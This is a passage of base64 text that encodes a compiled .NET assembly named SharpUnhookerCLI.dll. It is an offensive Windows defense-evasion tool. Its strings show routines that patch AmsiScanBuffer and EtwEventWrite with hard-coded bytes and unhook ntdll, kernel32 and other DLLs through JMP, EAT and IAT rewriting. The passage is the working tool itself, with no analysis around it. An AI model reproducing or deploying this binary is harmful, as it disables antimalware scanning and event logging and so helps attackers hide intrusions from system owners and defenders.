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ACSACQAAACTADgBSgF9AYgBjQGSAZcBnAGiAcUB+gEnAosC3AL3AhUDGwM7A3MDvQP3AwAEAgABAAgABwAAAD4CVAAAAEwCWAAAAFcCXQAAAGgCYgAAAHkCZwAAAI0CbQAAAG4HjgACAAQAAwACAAUABQACAAYABwACAAcACQACAAgACwACAAkADQACAAoADwBUAUsCBIAAAAAAAAAAAAAAAAAAAAAAsAkAAAQAAAAAAAAAAAAAAAEAEgEAAAAABAAAAAAAAAAAAAAAAQAbAQAAAAAEAAAAAAAAAAAAAAABALMMAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAKAAIADAALAA8ADgAQAA4AEQAOABIADgAAAAAABwDMAQYADgEGAB4BBgAjAQYAKAEGAC0BTQBFAlEARQJTAEUCAAAAAAA8TW9kdWxlPgBTaGFycFVuaG9va2VyQ0xJLmRsbABQRVJlYWRlcgBJTUFHRV9ET1NfSEVBREVSAElNQUdFX0RBVEFfRElSRUNUT1JZAElNQUdFX09QVElPTkFMX0hFQURFUjMyAElNQUdFX09QVElPTkFMX0hFQURFUjY0AElNQUdFX0ZJTEVfSEVBREVSAElNQUdFX1NFQ1RJT05fSEVBREVSAElNQUdFX0JBU0VfUkVMT0NBVElPTgBEYXRhU2VjdGlvbkZsYWdzAER5bmF2b2tlAE50UHJvdGVjdFZpcnR1YWxNZW1vcnlEZWxlZ2F0ZQBQYXRjaEFNU0lBbmRFVFcAU2hhcnBVbmhvb2tlcgBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AFZhbHVlVHlwZQBFbnVtAE11bHRpY2FzdERlbGVnYXRlAGRvc0hlYWRlcgBmaWxlSGVhZGVyAG9wdGlvbmFsSGVhZGVyMzIAb3B0aW9uYWxIZWFkZXI2NABpbWFnZVNlY3Rpb25IZWFkZXJzAHJhd2J5dGVzAC5jdG9yAFN5c3RlbS5JTwBCaW5hcnlSZWFkZXIARnJvbUJpbmFyeVJlYWRlcgBUAGdldF9JczMyQml0SGVhZGVyAGdldF9GaWxlSGVhZGVyAGdldF9PcHRpb25hbEhlYWRlcjMyAGdldF9PcHRpb25hbEhlYWRlcjY0AGdldF9JbWFnZVNlY3Rpb25IZWFkZXJzAGdldF9SYXdCeXRlcwBJczMyQml0SGVhZGVyAEZpbGVIZWFkZXIAT3B0aW9uYWxIZWFkZXIzMgBPcHRpb25hbEhlYWRlcjY0AEltYWdlU2VjdGlvbkhlYWRlcnMAUmF3Qnl0ZXMAZV9tYWdpYwBlX2NibHAAZV9jcABlX2NybGMAZV9jcGFyaGRyAGVfbWluYWxsb2MAZV9tYXhhbGxvYwBlX3NzAGVfc3AAZV9jc3VtAGVfaXAAZV9jcwBlX2xmYXJsYwBlX292bm8AZV9yZXNfMABlX3Jlc18xAGVfcmVzXzIAZV9yZXNfMwBlX29lbWlkAGVfb2VtaW5mbwBlX3JlczJfMABlX3JlczJfMQBlX3JlczJfMgBlX3JlczJfMwBlX3JlczJfNABlX3JlczJfNQBlX3JlczJfNgBlX3JlczJfNwBlX3JlczJfOABlX3JlczJfOQBlX2xmYW5ldwBWaXJ0dWFsQWRkcmVzcwBTaXplAE1hZ2ljAE1ham9yTGlua2VyVmVyc2lvbgBNaW5vckxpbmtlclZlcnNpb24AU2l6ZU9mQ29kZQBTaXplT2ZJbml0aWFsaXplZERhdGEAU2l6ZU9mVW5pbml0aWFsaXplZERhdGEAQWRkcmVzc09mRW50cnlQb2ludABCYXNlT2ZDb2RlAEJhc2VPZkRhdGEASW1hZ2VCYXNlAFNlY3Rpb25BbGlnbm1lbnQARmlsZUFsaWdubWVudABNYWpvck9wZXJhdGluZ1N5c3RlbVZlcnNpb24ATWlub3JPcGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1ham9ySW1hZ2VWZXJzaW9uAE1pbm9ySW1hZ2VWZXJzaW9uAE1ham9yU3Vic3lzdGVtVmVyc2lvbgBNaW5vclN1YnN5c3RlbVZlcnNpb24AV2luMzJWZXJzaW9uVmFsdWUAU2l6ZU9mSW1hZ2UAU2l6ZU9mSGVhZGVycwBDaGVja1N1bQBTdWJzeXN0ZW0ARGxsQ2hhcmFjdGVyaXN0aWNzAFNpemVPZlN0YWNrUmVzZXJ2ZQBTaXplT2ZTdGFja0NvbW1pdABTaXplT2ZIZWFwUmVzZXJ2ZQBTaXplT2ZIZWFwQ29tbWl0AExvYWRlckZsYWdzAE51bWJlck9mUnZhQW5kU2l6ZXMARXhwb3J0VGFibGUASW1wb3J0VGFibGUAUmVzb3VyY2VUYWJsZQBFeGNlcHRpb25UYWJsZQBDZXJ0aWZpY2F0ZVRhYmxlAEJhc2VSZWxvY2F0aW9uVGFibGUARGVidWcAQXJjaGl0ZWN0dXJlAEdsb2JhbFB0cgBUTFNUYWJsZQBMb2FkQ29uZmlnVGFibGUAQm91bmRJbXBvcnQASUFUAERlbGF5SW1wb3J0RGVzY3JpcHRvcgBDTFJSdW50aW1lSGVhZGVyAFJlc2VydmVkAE1hY2hpbmUATnVtYmVyT2ZTZWN0aW9ucwBUaW1lRGF0ZVN0YW1wAFBvaW50ZXJUb1N5bWJvbFRhYmxlAE51bWJlck9mU3ltYm9scwBTaXplT2ZPcHRpb25hbEhlYWRlcgBDaGFyYWN0ZXJpc3RpY3MATmFtZQBWaXJ0dWFsU2l6ZQBTaXplT2ZSYXdEYXRhAFBvaW50ZXJUb1Jhd0RhdGEAUG9pbnRlclRvUmVsb2NhdGlvbnMAUG9pbnRlclRvTGluZW51bWJlcnMATnVtYmVyT2ZSZWxvY2F0aW9ucwBOdW1iZXJPZkxpbmVudW1iZXJzAGdldF9TZWN0aW9uAFNlY3Rpb24AVmlydHVhbEFkcmVzcwBTaXplT2ZCbG9jawB2YWx1ZV9fAFN0dWIAR2V0RXhwb3J0QWRkcmVzcwBOdFByb3RlY3RWaXJ0dWFsTWVtb3J5AEludm9rZQBJQXN5bmNSZXN1bHQAQXN5bmNDYWxsYmFjawBCZWdpbkludm9rZQBFbmRJbnZva2UAUGF0Y2hFVFcAUGF0Y2hBTVNJAFJ1bgBCbGFja2xpc3RlZEZ1bmN0aW9uAElzQmxhY2tsaXN0ZWRGdW5jdGlvbgBDb3B5AEpNUFVuaG9va2VyAEVBVFVuaG9va2VyAElBVFVuaG9va2VyAE1haW4AZmlsZVBhdGgAZmlsZUJ5dGVzAHJlYWRlcgBNb2R1bGVCYXNlAEV4cG9ydE5hbWUAUHJvY2Vzc0hhbmRsZQBCYXNlQWRkcmVzcwBSZWdpb25TaXplAE5ld1Byb3RlY3QAT2xkUHJvdGVjdABvYmplY3QAbWV0aG9kAGNhbGxiYWNrAHJlc3VsdABGdW5jTmFtZQBzb3VyY2UAc291cmNlU3RhcnRJbmRleABkZXN0aW5hdGlvbgBkZXN0aW5hdGlvblN0YXJ0SW5kZXgAbGVuZ3RoAERMTG5hbWUATW9kdWxlTmFtZQBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU2hhcnBVbmhvb2tlckNMSQBGaWxlU3RyZWFtAEZpbGVNb2RlAEZpbGVBY2Nlc3MAU3RyZWFtAFNlZWtPcmlnaW4AU2VlawBSZWFkVUludDMyAEZpbGUAUmVhZEFsbEJ5dGVzAElEaXNwb3NhYmxlAERpc3Bvc2UATWVtb3J5U3RyZWFtAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1hcnNoYWwAU2l6ZU9mAFJlYWRCeXRlcwBHQ0hhbmRsZQBHQ0hhbmRsZVR5cGUAQWxsb2MAQWRkck9mUGlubmVkT2JqZWN0AFB0clRvU3RydWN0dXJlAEZyZWUAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRyaWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUAQ2hhcgBBcnJheQBTdHJpbmcARmxhZ3NBdHRyaWJ1dGUASW50UHRyAFplcm8AVG9JbnQ2NABvcF9FeHBsaWNpdABSZWFkSW50MzIAUmVhZEludDE2AFB0clRvU3RyaW5nQW5zaQBTdHJpbmdDb21wYXJpc29uAEVxdWFscwBJbnZhbGlkT3BlcmF0aW9uRXhjZXB0aW9uAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzTW9kdWxlADxOdFByb3RlY3RWaXJ0dWFsTWVtb3J5PmJfXzAAeABGdW5jYDIAQ1MkPD45X19DYWNoZWRBbm9ueW1vdXNNZXRob2REZWxlZ2F0ZTEAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAZ2V0X0ZpbGVOYW1lAFBhdGgAR2V0RmlsZU5hbWUAVUludDMyAFByb2Nlc3MAR2V0Q3VycmVudFByb2Nlc3MAUHJvY2Vzc01vZHVsZUNvbGxlY3Rpb24AZ2V0X01vZHVsZXMAU3lzdGVtLkNvcmUAU3lzdGVtLkxpbnEARW51bWVyYWJsZQBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBJRW51bWVyYWJsZWAxAFN5c3RlbS5Db2xsZWN0aW9ucwBJRW51bWVyYWJsZQBDYXN0AFdoZXJlAEZpcnN0T3JEZWZhdWx0AGdldF9CYXNlQWRkcmVzcwBEZWxlZ2F0ZQBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBEeW5hbWljSW52b2tlAFVubWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBDYWxsaW5nQ29udmVudGlvbgA8UGF0Y2hFVFc+Yl9fMABCeXRlAGdldF9TaXplAFNwbGl0AENvbnZlcnQAVG9CeXRlAFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9BU0NJSQBGcm9tQmFzZTY0U3RyaW5nAEdldFN0cmluZwBDb25zb2xlAFdyaXRlTGluZQBFeGNlcHRpb24AZ2V0X01lc3NhZ2UAZ2V0X0lubmVyRXhjZXB0aW9uADxQYXRjaEFNU0k+Yl9fMgBDUyQ8PjlfX0NhY2hlZEFub255bW91c01ldGhvZERlbGVnYXRlMwBvcF9JbmVxdWFsaXR5AEFyZ3VtZW50TnVsbEV4Y2VwdGlvbgBBcmd1bWVudE91dE9mUmFuZ2VFeGNlcHRpb24APD5jX19EaXNwbGF5Q2xhc3MzADxKTVBVbmhvb2tlcj5iX18wADxKTVBVbmhvb2tlcj5iX18xAEVtcHR5AG9wX0FkZGl0aW9uAFRvVXBwZXIAPD5jX19EaXNwbGF5Q2xhc3M4ADxFQVRVbmhvb2tlcj5iX181ADxFQVRVbmhvb2tlcj5iX182AG9wX0VxdWFsaXR5AEFsbG9jSEdsb2JhbABXcml0ZUludDMyAEludDMyAFRvU3RyaW5nAEZyZWVIR2xvYmFsADw+Y19fRGlzcGxheUNsYXNzZAA8SUFUVW5ob29rZXI+Yl9fYQA8PmNfX0Rpc3BsYXlDbGFzczEwAENTJDw+OF9fbG9jYWxzZQBDdXJyZW50SW1wb3J0VGFibGVOYW1lADxJQVRVbmhvb2tlcj5iX19iAFRyaW0AU3RhcnRzV2l0aABSZWFkSW50UHRyAElzTnVsbE9yRW1wdHkAV3JpdGVJbnRQdHIALmNjdG9yAAA/RgBhAGkAbABlAGQAIAB0AG8AIABwAGEAcgBzAGUAIABtAG8AZAB1AGwAZQAgAGUAeABwAG8AcgB0AHMALgAAE24AdABkAGwAbAAuAGQAbABsAAAtTgB0AFAAcgBvAHQAZQBjAHQAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAAHTMAMwAsAGMAMAAsAGMAMgAsADEANAAsADAAMAAAFzQAOAAsADMAMwAsAEMAMAAsAEMAMwAAG0UAdAB3AEUAdgBlAG4AdABXAHIAaQB0AGUAAFlXAHkAcwByAEsAMQAwAGcAUgBWAFIAWABJAEYATgBWAFEAMABOAEYAVQAxAE4ARwBWAFUAeABNAFcAUwBCAFEAUQBWAFIARABTAEUAVgBFAEkAUQA9AD0AAA9bAC0AXQAgAHsAMAB9AAEZWQBXADEAegBhAFMANQBrAGIARwB3AD0AAC9CADgALAA1ADcALAAwADAALAAwADcALAA4ADAALABDADIALAAxADgALAAwADAAACNCADgALAA1ADcALAAwADAALAAwADcALAA4ADAALABDADMAAB1BAG0AcwBpAFMAYwBhAG4AQgB1AGYAZgBlAHIAAFlXAHkAcwByAEsAMQAwAGcAUQBVADEAVABTAFMAQgBUAFYAVQBOAEQAUgBWAE4AVABSAGwAVgBNAFQARgBrAGcAVQBFAEYAVQBRADAAaABGAFIAQwBFAD0AAFFXAHkAMQBkAEkARQBGAE4AVQAwAGsAdQBSAEUAeABNAEkARQBsAFQASQBFADUAUABWAEMAQgBFAFIAVgBSAEYAUQAxAFIARgBSAEMARQA9AABvRQB4AGMAZQBwAHQAaQBvAG4AIAA6ACAATwBuAGUAIABvAHIAIABtAG8AcgBlACAAbwBmACAAdABoAGUAIABhAHIAZwB1AG0AZQBuAHQAcwAgAGEAcgBlACAAegBlAHIAbwAvAG4AdQBsAGwAIQAAaUUAeABjAGUAcAB0AGkAbwBuACAAOgAgAGwAZQBuAGcAdABoACAAZQB4AGMAZQBlAGQAcwAgAHQAaABlACAAcwBpAHoAZQAgAG8AZgAgAHMAbwB1AHIAYwBlACAAYgB5AHQAZQBzACEAAICTRQB4AGMAZQBwAHQAaQBvAG4AIAA6ACAAcwBvAHUAcgBjAGUAUwB0AGEAcgB0AEkAbgBkAGUAeAAgAGEAbgBkACAAbABlAG4AZwB0AGgAIABlAHgAYwBlAGUAZABzACAAdABoAGUAIABzAGkAegBlACAAbwBmACAAcwBvAHUAcgBjAGUAIABiAHkAdABlAHMAIQAAgKdFAHgAYwBlAHAAdABpAG8AbgAgADoAIABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AUwB0AGEAcgB0AEkAbgBkAGUAeAAgAGEAbgBkACAAbABlAG4AZwB0AGgAIABlAHgAYwBlAGUAZABzACAAdABoAGUAIABzAGkAegBlACAAbwBmACAAZABlAHMAdABpAG4AYQB0AGkAbwBuACAAYgB5AHQAZQBzACEAAElbACoAXQAgAE0AbwBkAHUAbABlACAAaQBzACAAbgBvAHQAIABsAG8AYQBkAGUAZAAsAFMAawBpAHAAcABpAG4AZwAuAC4ALgAACy4AdABlAHgAdAAAXVsALQBdACAARgBhAGkAbABlAGQAIAB0AG8AIABjAGgAYQBuAGcAZQAgAG0AZQBtAG8AcgB5ACAAcAByAG8AdABlAGMAdABpAG8AbgAgAHQAbwAgAFIAVwBYACEAAW1bAC0AXQAgAEYAYQBpAGwAZQBkACAAdABvACAAcgBlAHAAbABhAGMAZQAgAHQAaABlACAALgB0AGUAeAB0ACAAcwBlAGMAdABpAG8AbgAgAG8AZgAgAHQAaABlACAAbQBvAGQAdQBsAGUAIQABLVsAKwArACsAXQAgAHsAMAB9ACAASQBTACAAVQBOAEgATwBPAEsARQBEACEAAElbAC0AXQAgAE0AbwBkAHUAbABlACAAaQBzACAAbgBvAHQAIABsAG8AYQBkAGUAZAAsAFMAawBpAHAAcABpAG4AZwAuAC4ALgABX1sALQBdACAATQBvAGQAdQBsAGUAIABkAG8AZQBzAG4AdAAgAGgAYQB2AGUAIABhAG4AeQAgAGUAeABwAG8AcgB0AHMALAAgAHMAawBpAHAAcABpAG4AZwAuAC4ALgABZ1sALQBdACAARgBhAGkAbABlAGQAIAB0AG8AIABjAGgAYQBuAGcAZQAgAEUAQQBUACcAcwAgAG0AZQBtAG8AcgB5ACAAcAByAG8AdABlAGMAdABpAG8AbgAgAHQAbwAgAFIAVwAhAAGAoVsALQBdACAARgBhAGkAbABlAGQAIAB0AG8AIAByAGUAdwByAGkAdABlACAAdABoAGUAIABFAEEAVAAgAG8AZgAgAHsAMAB9ACAAdwBpAHQAaAAgAFIAVgBBACAAbwBmACAAewAxAH0AIABhAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAG8AcgBkAGkAbgBhAGwAIABvAGYAIAB7ADIAfQABBVgANAAAP1sAKwArACsAXQAgAHsAMAB9ACAARQBYAFAATwBSAFQAUwAgAEEAUgBFACAAQwBMAEUAQQBOAFMARQBEACEAAEtbAC0AXQAgAE0AbwBkAHUAbABlACAAaQBzACAAbgBvAHQAIABsAG8AYQBkAGUAZAAsACAAUwBrAGkAcABwAGkAbgBnAC4ALgAuAAFfWwAtAF0AIABNAG8AZAB1AGwAZQAgAGQAbwBlAHMAbgB0ACAAaABhAHYAZQAgAGEAbgB5ACAAaQBtAHAAbwByAHQAcwAsACAAUwBrAGkAcABwAGkAbgBnAC4ALgAuAAFnWwAtAF0AIABGAGEAaQBsAGUAZAAgAHQAbwAgAGMAaABhAG4AZwBlACAASQBBAFQAJwBzACAAbQBlAG0AbwByAHkAIABwAHIAbwB0AGUAYwB0AGkAbwBuACAAdABvACAAUgBXACEAARVhAHAAaQAtAG0AcwAtAHcAaQBuAAGAs1sALQBdACAARgBhAGkAbABlAGQAIAB0AG8AIABmAGkAbgBkACAAZgB1AG4AYwB0AGkAbwBuACAAZQB4AHAAbwByAHQAIABhAGQAZAByAGUAcwBzACAAbwBmACAAewAwAH0AIABmAHIAbwBtACAAewAxAH0AIQAgAEMAdQByAHIAZQBuAHQARgB1AG4AYwB0AGkAbwBuAE4AYQBtAGUAQQBkAGQAcgAgAD0AIAB7ADIAfQABXVsALQBdACAARgBhAGkAbABlAGQAIAB0AG8AIAByAGUAdwByAGkAdABlACAASQBBAFQAIABvAGYAIAB7ADAAfQAhACAAUgBlAGEAcwBvAG4AIAA6ACAAewAxAH0AAT9bACsAKwArAF0AIAB7ADAAfQAgAEkATQBQAE8AUgBUAFMAIABBAFIARQAgAEMATABFAEEATgBTAEUARAAhAABZWwAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQBdAAFZWwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEMAbABlAGEAbgBpAG4AZwAgAFAAcgBvAGMAZQBzAHMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABdAAAZawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAAB1rAGUAcgBuAGUAbABiAGEAcwBlAC4AZABsAGwAABlhAGQAdgBhAHAAaQAzADIALgBkAGwAbAAAKUUAbgB0AGUAcgBDAHIAaQB0AGkAYwBhAGwAUwBlAGMAdABpAG8AbgAAKUwAZQBhAHYAZQBDAHIAaQB0AGkAYwBhAGwAUwBlAGMAdABpAG8AbgAAK0QAZQBsAGUAdABlAEMAcgBpAHQAaQBjAGEAbABTAGUAYwB0AGkAbwBuAAAnSQBuAGkAdABpAGEAbABpAHoAZQBTAEwAaQBzAHQASABlAGEAZAAAE0gAZQBhAHAAQQBsAGwAbwBjAAAXSABlAGEAcABSAGUAQQBsAGwAbwBjAAARSABlAGEAcABTAGkAegBlAAAAA81+oc72/0uXgYv4DFGQyQAIt3pcVhk04IkDBhEMAwYRHAMGERQDBhEYBAYdESADBh0FBCABAQ4FIAEBHQUHEAEBHgASFQMgAAIEIAARHAQgABEUBCAAERgFIAAdESAEIAAdBQMoAAIEKAARHAQoABEUBCgAERgFKAAdESAEKAAdBQIGBwIGCQIGBQMGERACBgsDBh0DAwYRKAMgAA4DKAAOBAAAAAAFAAIYGA4LAAUCGBAYEBgJEAkDIAABBSACARwYCyAFCRgQGBAYCRAJDyAHEhkYEBgQGAkQCRIdHAsgBAkQGBAYEAkSGQMAAAEDBh0OBAABAg4MAAUBEB0FCBAdBQgIBAABAQ4EIAEBCAggAwEOES0RMQUgAQESNQQKAREMBiACCgoROQMgAAkECgERHAQKAREUBAoBERgECgERIAUAAR0FDgkHBRIpEhUJCAIHIAMBHQUICAkHBRJFEhUJCAICHgAGAAESSRFNBQABCBJJBSABHQUIBwACEVUcEVkDIAAYBgACHBgSSQoHBB0FEVUeAB4ABAcCBwIEBwERHAQHAREUBAcBERgFBwEdESAEBwEdBQUgAQERYQUgAQERbQIeCAgAAwESdRJ1CAUgAQEdAwcHBAgdAw4CBAEAAAACBhgDIAAKBAABGAoEAAEIGAQAAQYYBAABDhgHIAICDhGAhQQAAQoYFQcTGAgGCgYKCAgICAgICAgOCAgYAgYAAQISgI0KBhUSgJECEoCNAgQAAQ4OAwcBAgUAABKAoQUgABKApQ0QAQEVEoCtAR4AEoCxBQoBEoCNCRUSgJECEoCNAhkQAQIVEoCtAR4AFRKArQEeABUSgJECHgACDBABAR4AFRKArQEeAAgAAhKAtRgSSQUgARwdHA4HCB0cGBgSgLUJAh0cAgYgAQERgL0IAQADAAAAAAADAAAIBiABHQ4dAwUAAgUOCAgABAEdBQgYCAUAABKAyQUgAQ4dBQUAAgEOHAUgABKA0RQHDRgYHQUOHQ4IGBgJCRKA0QIdAwUAAgIYGBQHDRgdBQ4dDggYGBgJCRKA0QIdAwgAAwIODhGAhQUHAwgCAgUHAwgIAgIGDgYgAQISgI0EIAEBCgUAAhgYCAQAARgIHwcRDh0FEggICBgdBRgYCQICCRUSgJECEoCNAhI8AgIFAAIBGAgEIAEODgcABAEOHBwcBAABARguByEYDh0FCAYKBgoSCAgIGAgYCAgICAgICAgYGAkOCAgICRUSgJECEoCNAhJAAgMGEkQEIAECDgQAARgYBQACARgYBgADAQ4cHDMHHRgYGAYYGBgJCBgICBgYGBgIGBgYDhgSgNEVEoCRAhKAjQISSAkVEoCRAhKAjQISRAIFAAICDg4IBwQdDggdDgIEBwEdDggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAABAawAAAAAAAAAAAABeawAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUGsAAAAAAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWIAAAGwCAAAAAAAAAAAAAGwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAA